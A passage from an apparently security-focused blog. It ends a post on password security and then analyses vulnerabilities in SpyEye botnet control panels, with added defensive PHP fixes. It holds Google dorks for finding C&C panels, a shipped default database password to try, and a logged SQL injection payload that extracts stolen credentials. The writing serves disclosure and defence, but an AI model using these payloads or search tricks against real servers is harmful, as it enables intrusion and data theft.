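        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(dk_hex)
        iterations = int(iterations)
    except ValueError:
        return False
    if algo != "pbkdf2_sha256" or iterations < 1:
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(dk, expected)


def duplicate_hash_count(hashes: list) -> int:
    """How many stored hashes are shared with another user: what a leaked dump reveals at a glance."""
    return len(hashes) - len(set(hashes))


if __name__ == "__main__":
    # Constructed users: two of them picked the post's example password.
    users = {"alice": "Q@tCB3nx", "bob": "Q@tCB3nx", "carol": "correcthorsebatterystaple"}
    md5_store = {u: md5_unsalted(p) for u, p in users.items()}
    pbkdf2_store = {u: hash_password(p) for u, p in users.items()}
    print("duplicate hashes, MD5 store:   ", duplicate_hash_count(list(md5_store.values())))
    print("duplicate hashes, PBKDF2 store:", duplicate_hash_count(list(pbkdf2_store.values())))
    print("alice logs in:", verify_password("Q@tCB3nx", pbkdf2_store["alice"]))
    print("wrong password:", verify_password("Q@tCB3ny", pbkdf2_store["alice"]))
```

The MD5 store shows one duplicate (alice and bob), the PBKDF2 store none, and verification still works because the salt and iteration count travel with the record rather than living only in code.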
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsRt68nC1dinnh3SSqeE2CPqr9m89SSduc4C8Ufor9QljMPS2JQb_0XRlz6KYKZ1fZbqd__tweLYpdJt27jnzjYtnRk75bysGKx7k66oYQZ9iL1uoI1AbUoJd3vZCU9kBDOcyqQok5fA22/s1600/rig.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsRt68nC1dinnh3SSqeE2CPqr9m89SSduc4C8Ufor9QljMPS2JQb_0XRlz6KYKZ1fZbqd__tweLYpdJt27jnzjYtnRk75bysGKx7k66oYQZ9iL1uoI1AbUoJd3vZCU9kBDOcyqQok5fA22/s1600/rig.png" width="320" /></a></div>
<br />
Another attack is when the protected thing is not an online service, but rather an encrypted file or crypto-currency wallet.<br />
<br />
<h3>
Attacking the authentication system online</h3>
<div>
This is what happened in the recent iCloud hack (besides phishing). Attackers were attacking the authentication system, by either brute-forcing the password, or bypassing the password security by answering the security question. Good passwords cannot be brute-forced, as it takes ages. Good security answers have nothing to do with the question in the first place. A good security answer is as hard to guess as the password itself. If password recovery requires manual phone calls, I know, it is a bit awkward to say that your first dog's name was Xjg.2m`4cJw:V2= , but on the other hand, no one will guess that!<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGBSx71Kf9goDAxwfXLx6TlKZkpIVHhJtqOL5vedlDYXPJjkIbiIsFyoxGJGGMud1iONimRLGpqRPqk7yUeQejPSOpFRHAlRtGM584yyKkAYJ3AgG6lJkttofIntxxAaYveIEWXSmUA2jk/s1600/sec_questions.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGBSx71Kf9goDAxwfXLx6TlKZkpIVHhJtqOL5vedlDYXPJjkIbiIsFyoxGJGGMud1iONimRLGpqRPqk7yUeQejPSOpFRHAlRtGM584yyKkAYJ3AgG6lJkttofIntxxAaYveIEWXSmUA2jk/s1600/sec_questions.png" width="320" /></a></div>
<div>
<br /></div>
<div>
<h3>
Attacking single sign on</h3>
</div>
<div>
This type of attack is a bit different, as I was not able to put the "<a href="http://en.wikipedia.org/wiki/Pass_the_hash" target="_blank">pass the hash</a>" attacks anywhere else. The pass the hash attack is usually found in Windows domain environments, but others might be affected as well. The key thing is single sign on. If you can log in to one system (e.g. your workstation), and access many different network resources (file share, printer, web proxy, e-mail, etc.) without providing any password, then something (a secret) has to be in memory which can be used to authenticate to the services. If an attacker can access this secret, he will be able to access all these services. The key thing is (again) it does not matter how complex your passwords are, how long they are, how often you change them, as someone can easily misuse that secret.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimkhLtVDo_giOaVVrantzMq8fDbXAu173ZQX4bDmN8GNjUoHEg8gLSam6aw3lmJ1TePsVRXOOGE__d2rEYsMhyphenhyphenWWjlUnrxDv0pyl21DH6fsGkktml2ogitf7hP9M4NAH6AQ9R5Sd_M04SP/s1600/passthehash.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimkhLtVDo_giOaVVrantzMq8fDbXAu173ZQX4bDmN8GNjUoHEg8gLSam6aw3lmJ1TePsVRXOOGE__d2rEYsMhyphenhyphenWWjlUnrxDv0pyl21DH6fsGkktml2ogitf7hP9M4NAH6AQ9R5Sd_M04SP/s1600/passthehash.jpg" width="320" /></a></div>
<h3>
Attacking 2FA</h3>
<div>
As already stated, 2 factor authentication raises the effort from an attacker's point of view, but does not provide 100% protection. </div>
<div>
<ul>
<li>one time tokens (SecurID, Yubikey) can be relayed in a <a href="https://www.youtube.com/watch?v=Bf2nYkn32DM" target="_blank">man-in-the-middle attack</a>, </li>
<li><a href="http://www.computerworld.com/article/2493077/malware-vulnerabilities/proof-of-concept-malware-can-share-usb-smart-card-readers-with-attackers-ove.html" target="_blank">smartcard authentication can be relayed</a> with the help of malware to the attacker's machine - or simply circumvented by browser malware, </li>
<li>text based (SMS) messages can be stolen by <a href="http://www.kaspersky.com/about/news/virus/2011/Teamwork_How_the_ZitMo_Trojan_Bypasses_Online_Banking_Security" target="_blank">malware</a> on the smartphone or rerouted via SS7, </li>
<li>bio-metric protection is constantly <a href="http://www.ccc.de/en/updates/2013/ccc-breaks-apple-touchid" target="_blank">bypassed</a>,</li>
<li>SSH keys are constantly <a href="https://www.venafi.com/blog/post/i-hunt-sys-admins-ssh" target="_blank">stolen</a>,</li>
<li>but U2F keys are pretty good actually, even though BGP/DNS hijack or similar MiTM can still circumvent that protection,</li>
<li>etc. </li>
</ul>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx9dXS1Lb2yi9jTiDhhd_kYX2lik68Kt502iHvrkOET-XXH31TFZCTNgsCNYTqFqBeIDwZi0BWN9iOJddnjvQHDCoEJb889ca3lWh1rNfc4sELthydd5lgGztTm5Pnf8Zotg4T2chjqWGQ/s1600/asps1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx9dXS1Lb2yi9jTiDhhd_kYX2lik68Kt502iHvrkOET-XXH31TFZCTNgsCNYTqFqBeIDwZi0BWN9iOJddnjvQHDCoEJb889ca3lWh1rNfc4sELthydd5lgGztTm5Pnf8Zotg4T2chjqWGQ/s1600/asps1.png" /></a></div>
<div>
<br /></div>
</div>
<h3>
Others</h3>
Beware that there are tons of other attack methods to access your online account (like XSS/CSRF), but all of these have to be handled on the webserver side. The best you can do is to choose a website where the Bug Bounty program is running 24/7. Otherwise, the website may be full of low hanging, easy-to-hack bugs.<br />
<br />
Now that we have covered what we want to protect against what, in the <a href="http://jumpespjump.blogspot.com/2014/10/change-passwords-regularly-myth-and-lie_13.html" target="_blank">next blog post</a>, you will see how to do that. Stay tuned. I will also explain the title of this blog post.Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-72261525536597082014-08-22T19:09:00.000+02:002019-10-08T15:53:28.755+02:00Attacking financial malware botnet panels - SpyEye<div style="text-align: justify;">
This is the second blog post in the "Attacking financial malware botnet panels" series. After playing with <a href="http://jumpespjump.blogspot.com/2014/02/attacking-financial-malware-botnet.html" target="_blank">Zeus</a>, my attention turned to another old (and dead) botnet, SpyEye. From an ITSEC perspective, SpyEye shares a lot of vulnerabilities with Zeus. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The following report is based on SpyEye 1.3.45, which is old, and if we are lucky, the whole SpyEye branch will be dead soon. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Google dorks to find SpyEye C&C server panel related stuff:</div>
<br />
<ul>
<li style="text-align: justify;">if the img directory gets indexed, it is rather easy, search for e.g. inurl:b-ftpbackconnect.png</li>
<li style="text-align: justify;">if the install directory gets indexed, again, easy, search for e.g. inurl:spylogo.png</li>
<li style="text-align: justify;">also, if you find a login screen, check the CSS file (style.css); if you see #frm_viewlogs, #frm_stat, #frm_botsmon_country, #frm_botstat, #frm_gtaskloader and the like, you can be sure you have found it</li>
<li style="text-align: justify;">otherwise, it is best not to Google for it, but to get a SpyEye sample and analyze it</li>
</ul>
And this is what the control panel login looks like, nothing sophisticated:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUpS5IXNcNyAgCctc9PhOffHsfrF-zf6bQYEr3_GvCAhyphenhyphenSEP5QPf1CPf5UklmuDu3YwcnfJhyRXwLlzkGkJmxw6KXBUVNgjGy8zB5qLu8vNqMzmibRF7noeGXWNBCy3hqqoxWHJ4Hnw_Ob/s1600/sc01.png" style="margin-left: 1em; margin-right: 1em;"><img align="center/" border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUpS5IXNcNyAgCctc9PhOffHsfrF-zf6bQYEr3_GvCAhyphenhyphenSEP5QPf1CPf5UklmuDu3YwcnfJhyRXwLlzkGkJmxw6KXBUVNgjGy8zB5qLu8vNqMzmibRF7noeGXWNBCy3hqqoxWHJ4Hnw_Ob/s1600/sc01.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The best part is that you don't have to guess the admin's username ;)<br />
<br /></div>
<div style="text-align: justify;">
This is what an average control panel looks like:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5tAd2OoWOw94V142QVw6XV7n2RS9sCwzQYkZCJ_e0gwNUNg7FGmRLO1aK0Be1iFUQtCKgMozk9wlSIrHUejqj5t8Suh1_x6uVPJ8sTo3WcM0GtbxfEqa4svxmPwUjoxazHyKSsC2hH7w2/s1600/sc02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5tAd2OoWOw94V142QVw6XV7n2RS9sCwzQYkZCJ_e0gwNUNg7FGmRLO1aK0Be1iFUQtCKgMozk9wlSIrHUejqj5t8Suh1_x6uVPJ8sTo3WcM0GtbxfEqa4svxmPwUjoxazHyKSsC2hH7w2/s1600/sc02.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Hack the Planet! :)<br />
<br /></div>
<h3 style="text-align: justify;">
Boring vulns found (warning, an almost exact copy from the Zeus blog post)</h3>
<div>
<br /></div>
<ul>
<li style="text-align: justify;">Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies</li>
<li style="text-align: justify;">No password policy - admins can set up really weak passwords</li>
<li style="text-align: justify;">No anti-brute-force protection - you can try to guess the admin's password. There is no default username, as there is no username handling at all!</li>
<li style="text-align: justify;">Password autocomplete enabled - boring</li>
<li style="text-align: justify;">Missing HttpOnly flag on session cookie - interesting when combining with XSS</li>
<li style="text-align: justify;">No CSRF protection - e.g. you can upload new exe or bin files, turn plugins on/off :-( boring. Also the file extension check can be bypassed, but the files are stored in the database, so no PHP shell this time. If you check the following code, you can see that although the file extension and type are checked and an error message is produced, the upload process continues anyway. And even if the error did stop the upload process, the check could be fooled by setting an invalid $uptype. Well done ...</li>
</ul>
<div style="text-align: justify;">
<pre class="prettyprint linenums lang-php">if ($_FILES['file']['tmp_name'] && ($_FILES['file']['size'] > 0))
{
    $outstr = "<br>";
    set_time_limit(0);
    $filename = str_replace(" ","_",$_FILES['file']['name']);
    $ext = substr($filename, strrpos($filename, '.')+1);
    // the extension checks only append an error message; nothing stops the upload
    if( $ext==='bin' && $uptype!=='config' ) $outstr .= "<font class='error'>Bad CONFIG extension!</font><br>";
    if( $ext==='exe' && $uptype!=='body' && $uptype!=='exe' ) $outstr .= "<font class='error'>Bad extension!</font><br>";
    // an unknown $uptype falls into the default branch and is stored as an 'e' (exe) file
    switch( $uptype )
    {
        case 'body': $ext = 'b'; break;
        case 'config': $ext = 'c'; break;
        case 'exe': $ext = 'e'; break;
        default: $ext = 'e';
    }
    $_SESSION['file_ext'] = $ext;
    if( isset($_POST['bots']) && trim($_POST['bots']) !== '')
    {
        $bots = explode(' ', trim($_POST['bots']));
        //writelog("debug.log", trim($_POST['bots']));
        $filename .= "_".(LastFileId()+1);
    }
    if( FileExist($filename) ) $filename .= LastFileId();
    // the upload is processed regardless of the errors collected above
    $tmpName = $_FILES['file']['tmp_name'];
    $fileSize = $_FILES['file']['size'];
    $fileType = $_FILES['file']['type'];
    ## reading all file for calculating hash
    $fp = fopen($tmpName, 'r');
</pre>
</div>
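<div style="text-align: justify;">
For comparison, this is how the same check looks when it fails closed. This is an added example, not SpyEye code: it keeps the panel's request shape ($_FILES['file'] and $_POST['uptype']) and adds a CSRF token in $_POST['csrf'] and $_SESSION['csrf'], both of which are hypothetical names since the original has no CSRF protection at all. Every failed check returns immediately, and an unknown $uptype is rejected instead of silently becoming an exe.</div>

```php
<?php
// Added example, not SpyEye code: a fail-closed version of the upload check.
// Assumes the panel's request shape ($_FILES['file'], $_POST['uptype']) plus a
// CSRF token echoed in $_POST['csrf'] and kept in $_SESSION['csrf']; the token
// names are hypothetical, the original has no CSRF protection at all.
declare(strict_types=1);

// Each declared upload type is allowed exactly one extension. No default branch:
// anything not listed here is rejected instead of being treated as 'exe'.
const ALLOWED_UPLOADS = [
    'config' => 'bin',
    'body'   => 'exe',
    'exe'    => 'exe',
];

/**
 * Validate one upload request. Returns null when it is acceptable, otherwise
 * an error message. Every check returns immediately, so an error can never
 * be "shown but ignored" the way the original code does.
 */
function validate_upload(array $file, ?string $uptype, ?string $token, string $sessionToken): ?string
{
    if ($token === null || $sessionToken === '' || !hash_equals($sessionToken, $token)) {
        return 'Missing or invalid CSRF token';
    }
    if (!isset($file['tmp_name'], $file['error'], $file['name'])
        || $file['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return 'No file received';
    }
    if ($uptype === null || !array_key_exists($uptype, ALLOWED_UPLOADS)) {
        return 'Unknown upload type';
    }
    // Compare the real extension against the one the declared type permits.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if ($ext !== ALLOWED_UPLOADS[$uptype]) {
        return "Extension .$ext is not allowed for type $uptype";
    }
    return null;
}

// In the upload handler, after session_start():
$error = validate_upload(
    $_FILES['file'] ?? [],
    $_POST['uptype'] ?? null,
    $_POST['csrf'] ?? null,
    $_SESSION['csrf'] ?? ''
);
if ($error !== null) {
    http_response_code(400);
    echo htmlspecialchars($error, ENT_QUOTES, 'UTF-8');
    exit;                      // stop here; the original kept going after the error text
}
// Only now read $_FILES['file']['tmp_name'] and store the content in the database.
```

<div style="text-align: justify;">
The whitelist replaces the original's two negative checks: instead of asking "is this a bin with the wrong type?", it asks "which single extension does this type permit?", so a file that matches neither rule is no longer accepted by default.</div>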
<ul>
<li style="text-align: justify;">Clear text password storage - the MySQL passwords are stored in php files, in clear text. Also, the login password to the form panel is stored in clear text.</li>
<li style="text-align: justify;">MD5 password - the passwords stored in MySQL are unsalted MD5 hashes. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5. Just look at the pure simplicity of the login check, great work!</li>
</ul>
<div style="text-align: justify;">
<pre class="prettyprint lang-php">$query = "SELECT * FROM users_t WHERE uPswd='".md5($pswd)."'";</pre>
</div>
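<div style="text-align: justify;">
The same lookup done properly, as an added example that is not SpyEye code: a salted, slow password hash via password_hash()/password_verify() and a parameterized query through PDO. The table and column names (users_t, uPswd) come from the query above; the uName column is assumed, because the original has no username and identifies the admin by the password hash alone. The demo runs against an in-memory SQLite database with constructed data.</div>

```php
<?php
// Added example, not SpyEye code: the login lookup with a salted, slow password
// hash and a parameterized query. Table and column names (users_t, uPswd) come
// from the page's query; uName is assumed, since the original has no username
// and identifies the admin by the password hash alone.
declare(strict_types=1);

function create_user(PDO $db, string $name, string $password): void
{
    // password_hash() chooses a random salt and a deliberately slow algorithm
    // (bcrypt for PASSWORD_DEFAULT), so a leaked table cannot be cracked with a
    // plain MD5 lookup table.
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $db->prepare('INSERT INTO users_t (uName, uPswd) VALUES (:name, :hash)');
    $stmt->execute([':name' => $name, ':hash' => $hash]);
}

function check_login(PDO $db, string $name, string $password): bool
{
    // The bound parameter never becomes part of the SQL text, so quotes or
    // comment sequences in $name cannot change the query.
    $stmt = $db->prepare('SELECT uPswd FROM users_t WHERE uName = :name');
    $stmt->execute([':name' => $name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Verify against a throwaway hash when the user does not exist, so the
    // response time does not reveal which usernames are valid.
    $hash = $row === false ? password_hash('placeholder', PASSWORD_DEFAULT) : $row['uPswd'];
    $ok = password_verify($password, $hash);
    return $row !== false && $ok;
}

// Self-contained demo with an in-memory SQLite database (constructed data).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users_t (uName TEXT PRIMARY KEY, uPswd TEXT NOT NULL)');
create_user($db, 'admin', 'correct horse battery staple');

var_dump(check_login($db, 'admin', 'correct horse battery staple')); // genuine login
var_dump(check_login($db, 'admin', 'guess'));                        // wrong password
var_dump(check_login($db, "admin' OR '1'='1", 'guess'));             // quoting in the name changes nothing
```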
<div>
<ul>
<li style="text-align: justify;">ClickJacking - really boring stuff</li>
</ul>
<br />
<h3 style="text-align: justify;">
SQL injection</h3>
</div>
<div>
<br /></div>
<div style="text-align: justify;">
SpyEye has a fancy history of SQL injections. See details <a href="http://secniche.blogspot.hu/2011/08/blasting-spyeye-c-sql-injection-wins.html">here</a>, <a href="http://hacker-post.blogspot.hu/2013/01/pwning-spyeye-12x-and-13x.html">here</a>, <a href="http://bloz.isbox.org/2012/03/spyeye-sqlis.html">here</a>, video <a href="https://www.youtube.com/watch?v=ou-FB9MbbPM">here </a>and video <a href="https://www.youtube.com/watch?v=eCEK8S-9-q4">here</a>.<br />
<br />
It is important to highlight that most of the vulnerable functions are reachable without any authentication, because these PHP files never check for a logged-in user at the top of the file.<br />
<br /></div>
<div style="text-align: justify;">
But if a C&C server owner gets pwned through this vuln, it is not a good idea to complain to the developer, because after careful reading of the install guide, one can see:<br />
<br /></div>
<div style="text-align: justify;">
"For searching info in the collector database there is a PHP interface as formgrabber admin panel. The admin panel is not intended to be found on the server. This is a client application."<br />
<br /></div>
<div style="text-align: justify;">
And there are plenty of reasons not to install the formgrabber admin panel on any internet-reachable server. But this fact leads to another possible vulnerability. The user for this control panel is allowed to log in to the MySQL database remotely, and the install guide ships a ready-made password that is just asking to be reused. I mean, it looks pretty secure, there is no reason not to use it.<br />
<br />
<pre class="prettyprint lang-sql">CREATE USER 'frmcpviewer' IDENTIFIED BY 'SgFGSADGFJSDGKFy2763272qffffHDSJ';
</pre>
<br />
Next time you find a SpyEye panel, and you can connect to the MySQL database, it is worth a shot to try this password.<br />
<br />
Unfortunately the default permissions of this user are not enough to write files (select into outfile):<br />
<br />
<pre class="prettyprint">Access denied for user 'frmcpviewer' (using password: YES)</pre>
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
I also made a little experiment with this SQL injection vulnerability. I did set up a live SpyEye botnet panel, created the malware install binaries (droppers), and sent the droppers to the AV companies. And after more and more sandboxes connected to my box, someone started to exploit the SQL injection vulnerability on my server!<br />
<br /></div>
<div style="text-align: justify;">
<pre class="prettyprint">63.217.168.90 - - [16/Jun/2014:04:43:00 -0500] "GET /form/frm_boa-grabber_sub.php?bot_guid=&lm=3&dt=%20where%201=2%20union%20select%20@a:=1%20from%20rep1%20where%20@a%20is%20null%20union%20select%20@a:=%20@a%20%2b1%20union%20select%20concat(id,char(1,3,3,7),bot_guid,char(1,3,3,7),process_name,char(1,3,3,7),hooked_func,char(1,3,3,7),url,char(1,3,3,7),func_data)%20from%20rep2_20140610%20where%20@a=3%23 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"</pre>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Although the query did not return any meaningful data to the attacker (only data collected from sandboxes), it raises some legal questions.<br />
<br /></div>
<div style="text-align: justify;">
Which company/organization has the right to attack my server? </div>
<div>
<ul>
<li style="text-align: justify;">police (having a warrant)</li>
<li style="text-align: justify;">military (if we are at war)</li>
<li style="text-align: justify;">spy agencies (always/never, choose your favorite answer)</li>
<li style="text-align: justify;">CERT organisations?</li>
</ul>
<div style="text-align: justify;">
<br />
But does an AV company or security research company have the legal right to attack my server? I don't think so... The most problematic part is when they hack a server (without authorization) and sell the stolen information in the name of "intelligence service". What is it, the wild wild west?<br />
<br />
The SQLi clearly targets the content of the stolen login credentials. If this is not an AV company but an attacker, how did they get the SpyEye dropper? If this is an AV company, why are they stealing the stolen credentials? Will they notify the internet banking owners about the stolen credentials for free? Or will they do this for money?<br />
<br />
And don't get me wrong, I don't want to protect the criminals, but this is clearly a grey area in the law. From an ethical point of view, I agree with hacking the criminal's servers. As you can see, the whole post is about disclosing vulns in these botnet panels. But from a legal point of view, this is something tricky ... I'm really interested in the opinion of others, so comments are warmly welcome.<br />
<br />
On a side note, I was interested in how the "attackers" found the SpyEye form directory. Easy, they brute-forced it, with a wordlist of ~43,000 entries.<br />
<br />
<h3>
(Useless) Cross site scripting</h3>
<div>
<br /></div>
Although parts of the SpyEye panel are vulnerable to XSS, it is unlikely that you will find these components on the server, as this code is part of the install process, and the installer refuses to run if a valid install is found. And in this case, you also need the DB password to trigger the vuln...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUNjztjnpbcej-4S8tDBdWKR2E8BQnZw_eZZCnZ9Yz4rp7XzyGmLFDyn-D6HCX2ZVf47i5tMZnShZycZmCZgT5LRabyZXKHpSCt8xdyhV1YM9Ze_0xVKkINpSpGRBbd3cy3O7Vy3JtKs3t/s1600/xss_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUNjztjnpbcej-4S8tDBdWKR2E8BQnZw_eZZCnZ9Yz4rp7XzyGmLFDyn-D6HCX2ZVf47i5tMZnShZycZmCZgT5LRabyZXKHpSCt8xdyhV1YM9Ze_0xVKkINpSpGRBbd3cy3O7Vy3JtKs3t/s1600/xss_1.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkNY6pHhczucSLPimJZuXC2yf9jbkwux6elFSzv2Pvii-X_tkdsU_AYOjHsNpzSo1z62-2SW13m2N2wd2xqDnAs4ScyumVYnKGNioz2PXzYUSGr6JUFvA9rWtWKcZXWaXpZkHFtNTUUvAv/s1600/xss_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkNY6pHhczucSLPimJZuXC2yf9jbkwux6elFSzv2Pvii-X_tkdsU_AYOjHsNpzSo1z62-2SW13m2N2wd2xqDnAs4ScyumVYnKGNioz2PXzYUSGr6JUFvA9rWtWKcZXWaXpZkHFtNTUUvAv/s1600/xss_2.png" width="400" /></a></div>
<br />
<h3>
Session handling</h3>
<div>
<br /></div>
This is a fun part. The logout button invalidates the session only on the server side, not on the client side. Combine this with the fact that the login process never regenerates the session cookie (a.k.a. session fixation), and you can see that no matter how many times the admin logs into the application, the session cookie stays the same (until the admin closes the browser). So if you find a session cookie which was valid in the past but is not working at the moment, it may well become valid again in the future ...<br />
<br />
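<div style="text-align: justify;">
Both halves of this problem have a one-line fix each in PHP's native session handler. The following is an added example, not SpyEye code: a fresh session id on every successful login (so a cookie observed before login never becomes valid again) and a logout that expires the cookie on the client as well as destroying the server-side state. The 'secure' cookie flag is omitted only because the panel runs over plain HTTP; anything behind TLS should set it.</div>

```php
<?php
// Added example, not SpyEye code: session handling that closes both gaps the
// post describes, using PHP's native session handler. The 'secure' cookie flag
// is left out only because the panel runs over plain HTTP; a site behind TLS
// should set it.
declare(strict_types=1);

function start_secure_session(): void
{
    // HttpOnly keeps the cookie away from scripts (the post notes the flag is
    // missing), SameSite keeps it out of cross-site form posts (the CSRF issue).
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
    session_start();
}

function on_login_success(string $user): void
{
    // Fixation fix: issue a fresh session id on every login and delete the
    // old one, so a cookie seen before login never becomes valid again.
    session_regenerate_id(true);
    $_SESSION['user'] = $user;
    $_SESSION['csrf'] = bin2hex(random_bytes(32));
}

function logout(): void
{
    $_SESSION = [];
    // Client side: overwrite the cookie with an expired one so the browser
    // forgets it. The original only invalidated the server-side state.
    $p = session_get_cookie_params();
    setcookie(session_name(), '', [
        'expires'  => time() - 42000,
        'path'     => $p['path'],
        'domain'   => $p['domain'],
        'secure'   => $p['secure'],
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    // Server side: remove the stored session data.
    session_destroy();
}

// Request flow: start_secure_session() on every page, on_login_success() after
// the password check passes, logout() from the logout button.
```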
<h3>
Binary server</h3>
<div>
<br /></div>
Some SpyEye setups run a binary server component (called sec) on the server to collect the form data. It would be interesting to fuzz this component for vulns.<br />
<br />
<h3>
Log files revealed</h3>
<div>
<br /></div>
If the form panel mentioned in the SQLi part is installed on the server, it is worth visiting the <form_dir>/logs/error.log file; it may reveal the path of the webroot folder, the IP addresses of the admins, etc.<br />
<br />
<h3>
Reading the code</h3>
<div>
<br /></div>
Sometimes, reading the code, you find snippets that are hard to understand with a clear mind:
<br />
<br />
<pre class="prettyprint lang-php">$content = fread($fp, filesize($tmpName));
if ( $uptype === 'config' )
    $md5 = GetCRC32($content);   // a variable named $md5 holding a CRC32
else
    $md5 = md5($content);
....
<script>
// the panel refuses to work in any browser whose user agent contains "Mozilla/4.0"
if (navigator.userAgent.indexOf("Mozilla/4.0") != -1) {
    alert("Your browser is not support yet. Please, use another (FireFox, Opera, Safari)");
    document.getElementById("div_main").innerHTML = "<font class=\'error\'>ChAnGE YOuR BRoWsEr! Dont use BUGGED Microsoft products!</font>";
}
</script>
</pre>
<div>
<br />
<h3>
Decrypting SpyEye communication</h3>
</div>
<div>
It turned out that the communication between the malware and C&C server is not very sophisticated (Zeus does a better job at it, because the RC4 key stream is generated from the botnet password).</div>
<div>
<br /></div>
<div>
<div>
<pre class="prettyprint linenums lang-php">// decodes a bot request: every byte XORed with the hard-coded key 219;
// bytes equal to the key (which would decode to NUL) are simply dropped
function DeCode($content)
{
    $res = '';
    for($i = 0; $i < strlen($content); $i++)
    {
        $num = ord($content[$i]);
        if( $num != 219) $res .= chr($num^219);
    }
    return $res;
}
</pre>
</div>
</div>
</div>
Fixed XOR key, again, well done ...
<br />
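<div style="text-align: justify;">
What a fixed single-byte XOR key gives an analyst who captures one bot request, as an added example that is not SpyEye code: a mirror of DeCode() plus a key recovery routine that tries all 256 candidate keys against a known plaintext prefix. It assumes, as DeCode() shows, that the gate.php body is base64 of XOR(key, text). The ciphertext is the page's own sample request body, and "guid=" serves as the crib because that sample decodes to text beginning with it. Since the key is hard-coded in the panel, the same recovery works for every capture.</div>

```php
<?php
// Added example, not SpyEye code: what a fixed single-byte XOR key gives an
// analyst who captures one bot request. Assumes, as the page's DeCode() shows,
// that the gate.php body is base64 of XOR(key, text). The ciphertext below is
// the page's own sample; "guid=" is used as the crib because that sample
// decodes to text starting with it.
declare(strict_types=1);

// Mirror of the panel's DeCode(): XOR each byte with $key, dropping bytes equal
// to the key (their plaintext would be a NUL). Encoding is the same operation.
function xor_decode(string $data, int $key): string
{
    $out = '';
    for ($i = 0, $n = strlen($data); $i < $n; $i++) {
        $b = ord($data[$i]);
        if ($b !== $key) {
            $out .= chr($b ^ $key);
        }
    }
    return $out;
}

// A single-byte key has only 256 candidates; a known plaintext prefix picks one.
// Returns null when no key produces the crib.
function recover_xor_key(string $ciphertext, string $crib): ?int
{
    $head = substr($ciphertext, 0, strlen($crib));
    for ($key = 0; $key < 256; $key++) {
        if (xor_decode($head, $key) === $crib) {
            return $key;
        }
    }
    return null;
}

// The page's sample request body (base64 of the XORed text).
$captured = 'vK6yv+bt9er17O3r6vqPnoiPjZb2i5j6muvo6+rjmJ/9rb6p5urr6O/j/bK+5uP16/Xs7evq9ers7urv/bSo5u316vXs7evq/a6v5pq/trK1/bi4qbjm453j6uPv7Or9tr/u5um+uuvpve3p7eq/4+vsveLi7Lnqvrjr6ujs7rjt7rns/au3vOa5sre3srW8s7q2tr6p4Lm3tLiw4LmuvKm+q7Spr+C4uPu8qbq5ub6p4Li4vKm6ubm+qeC4qb6/sq+8qbq54LiuqK+0tri0tbW+uK+0qeC/v7So4L+1qLqrsuC+trqyt7ypurm5vqngvb24vqmvvKm6ubm+qeC9/aivuq/mtLW3srW+';
$raw = base64_decode($captured);

$key = recover_xor_key($raw, 'guid=');
if ($key === null) {
    exit("no single-byte key yields the crib\n");
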